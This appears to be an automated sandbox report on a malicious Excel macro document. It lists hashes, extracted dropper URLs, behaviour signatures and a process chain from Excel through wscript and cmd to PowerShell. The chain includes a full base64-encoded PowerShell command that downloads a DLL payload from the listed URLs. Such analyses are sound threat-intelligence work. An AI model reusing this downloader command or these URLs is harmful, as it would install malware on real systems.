Analysis

  • max time kernel
    153s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    04-02-2022 13:21

General

  • Target

    emo99.xls

  • Size

    142KB

  • MD5

    151a3a0128124613ed535a0c94fef154

  • SHA1

    202916a33701b5db729211b462a6abb94f98c1fa

  • SHA256

    8ddd5a2055cae9fa9e49ac6f4827d99d40d0ca74e880f521bc33079fb0d9405c

  • SHA512

    0732461d273e576a817cd220f1e0e1830e9bf02434142a66fb7093ca9bf29f35123db59e571aad7e3d49bec67d021300955849c6224b57e958dc97f6dcf34335

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://goyaluat.vmesh.in/0v6kcny/CG/

exe.dropper

https://mars.srl/wp-admin/7Ffk6LLN2Xs2W/

exe.dropper

http://franmulero.es/mbx/8c5RBJx6/

exe.dropper

http://varafood.com/Ajax/cnM91G/

exe.dropper

https://7jcat.com/wp-content/t/

exe.dropper

http://blog.centralhome.hu/wp-content/pB1RfPCnBlS1WfpcOL/

exe.dropper

http://zimrights.co.zw/oldsite/k0EoCWycU9tNo1d/

exe.dropper

https://mudhands.com/error/BfH/

exe.dropper

http://albatrospatagonia.com/phkcvt/t53ceSMDqgPQlq/

exe.dropper

http://mapcommunications.co.zw/wp-admin/mdRRbSdU3aB7Xpx6z/

exe.dropper

http://odconsult.co.uk/ALFA_DATA/HHr0FqOXAn62/

exe.dropper

http://dushkin.net/img/bhQSTNicEMtNQxP/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\emo99.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1476
    • C:\Windows\SysWOW64\wscript.exe
      wscript c:\programdata\sduoixo.vbs
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1136
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\programdata\jledshf.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -enc JABqAGUAbwBsAGkAcwBlADMAUgBoAGcARABaAFMANABjAGQAZgBnAD0AIgBoAHQAdABwADoALwAvAGcAbwB5AGEAbAB1AGEAdAAuAHYAbQBlAHMAaAAuAGkAbgAvADAAdgA2AGsAYwBuAHkALwBDAEcALwAsAGgAdAB0AHAAcwA6AC8ALwBtAGEAcgBzAC4AcwByAGwALwB3AHAALQBhAGQAbQBpAG4ALwA3AEYAZgBrADYATABMAE4AMgBYAHMAMgBXAC8ALABoAHQAdABwADoALwAvAGYAcgBhAG4AbQB1AGwAZQByAG8ALgBlAHMALwBtAGIAeAAvADgAYwA1AFIAQgBKAHgANgAvACwAaAB0AHQAcAA6AC8ALwB2AGEAcgBhAGYAbwBvAGQALgBjAG8AbQAvAEEAagBhAHgALwBjAG4ATQA5ADEARwAvACwAaAB0AHQAcABzADoALwAvADcAagBjAGEAdAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHQALwAsAGgAdAB0AHAAOgAvAC8AYgBsAG8AZwAuAGMAZQBuAHQAcgBhAGwAaABvAG0AZQAuAGgAdQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBwAEIAMQBSAGYAUABDAG4AQgBsAFMAMQBXAGYAcABjAE8ATAAvACwAaAB0AHQAcAA6AC8ALwB6AGkAbQByAGkAZwBoAHQAcwAuAGMAbwAuAHoAdwAvAG8AbABkAHMAaQB0AGUALwBrADAARQBvAEMAVwB5AGMAVQA5AHQATgBvADEAZAAvACwAaAB0AHQAcABzADoALwAvAG0AdQBkAGgAYQBuAGQAcwAuAGMAbwBtAC8AZQByAHIAbwByAC8AQgBmAEgALwAsAGgAdAB0AHAAOgAvAC8AYQBsAGIAYQB0AHIAbwBzAHAAYQB0AGEAZwBvAG4AaQBhAC4AYwBvAG0ALwBwAGgAawBjAHYAdAAvAHQANQAzAGMAZQBTAE0ARABxAGcAUABRAGwAcQAvACwAaAB0AHQAcAA6AC8ALwBtAGEAcABjAG8AbQBtAHUAbgBpAGMAYQB0AGkAbwBuAHMALgBjAG8ALgB6AHcALwB3AHAALQBhAGQAbQBpAG4ALwBtAGQAUgBSAGIAUwBkAFUAMwBhAEIANwBYAHAAeAA2AHoALwAsAGgAdAB0AHAAOgAvAC8AbwBkAGMAbwBuAHMAdQBsAHQALgBjAG8ALgB1AGsALwBBAEwARgBBAF8ARABBAFQAQQAvAEgASAByADAARgBxAE8AWABBAG4ANgAyAC8ALABoAHQAdABwADoALwAvAGQAdQBzAGgAawBpAG4ALgBuAGUAdAAvAGkAbQBnAC8AYgBoAFEAUwBUAE4AaQBjAEUATQB0AE4AUQB4AFAALwAiAC4AcwBwAEwAaQBUACgAIgAsACIAKQA7AGYATwByAGUAYQBDAGgAKAAkAGoAZAB0AEYASgBkAFgAaAByADYAdAB4AHkAaABkACAAaQBuACAAJABqAGUAbwBsAGkAcwBlADMAUgBoAGcARABaAFMANABjAGQAZgBnACkAewAkAHIAaAB5AGsAYQBqAGQAaABmAHMANwBpAGQAZgBnAGQAPQAiAGMAOgBcAHAAcgBvAGcAcgBhAG0AZABhAHQAYQBcAHYAYgBrAHcAawAuAGQAbABsACIAOwBpAE4AdgBPAGsAZQAtAHcARQBiAHIAZQBRAHUAZQBzAFQAIAAtAHUAUgBpACAAJABqAGQAdABGAEoAZABYAGgAcgA2AHQAeAB5AGgAZAAgAC0AbwB1AFQAZgBpAEwAZQAgACQAcgBoAHkAawBhAGoAZABoAGYAcwA3AGkAZABmAGcAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJAByAGgAeQBrAGEAagBkAGgAZgBzADcAaQBkAGYAZwBkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQAcgBoAHkAawBhAGoAZABoAGYAcwA3AGkAZABmAGcAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADQANQAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1032

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\programdata\jledshf.bat

    MD5

    110f05646abf0c483b53019e664c6c21

    SHA1

    c6fb54ff71b2b6fe0ffef9a373d45b79a66da8bc

    SHA256

    5bd596d98d2f49f22a480c3a0a3d78c81bc4214ead15cf1e069d20aee8b178fe

    SHA512

    6b671d9ecf389786d54538c1459de5842d0cd6bffd6c55a8ea866b041a4522e86c79dc6dc5eb15e7d4103618557e0dfb91fe31cf1683f6b9d0d896390b87b329

  • \??\c:\programdata\sduoixo.vbs

    MD5

    87a9c41dc3e67b9b0b6cdb367d4858bd

    SHA1

    00f117f9a02dad3c127b2c607ead43300c2bebbe

    SHA256

    f0b09a17f07b03b8cfe1969f84fcfb96933439707fa86ba8aa79181145512e18

    SHA512

    7373ca3127a1baf85e3cc6beb7b046788132b1bb388405657cb924435386d186a2645971128dc582a970242c4a3dfdc7fcce78ed158b0d430c96bbd18686f1dd

  • memory/1032-124-0x0000000002360000-0x0000000002361000-memory.dmp

    Filesize

    4KB

  • memory/1032-126-0x0000000002361000-0x0000000002362000-memory.dmp

    Filesize

    4KB

  • memory/1032-127-0x0000000002362000-0x0000000002364000-memory.dmp

    Filesize

    8KB

  • memory/1476-82-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-119-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-57-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1476-79-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-59-0x0000000005F20000-0x0000000005F22000-memory.dmp

    Filesize

    8KB

  • memory/1476-60-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-61-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-63-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-62-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-71-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-70-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-69-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-68-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-67-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-66-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-65-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-64-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-91-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-83-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-55-0x000000002F281000-0x000000002F284000-memory.dmp

    Filesize

    12KB

  • memory/1476-81-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-80-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-58-0x0000000074EC1000-0x0000000074EC3000-memory.dmp

    Filesize

    8KB

  • memory/1476-56-0x0000000071381000-0x0000000071383000-memory.dmp

    Filesize

    8KB

  • memory/1476-72-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-90-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-84-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-93-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-92-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-94-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-95-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-107-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-106-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-105-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-104-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-103-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-102-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-96-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-108-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-117-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-116-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-115-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-114-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-78-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB

  • memory/1476-118-0x0000000000540000-0x00000000005F6000-memory.dmp

    Filesize

    728KB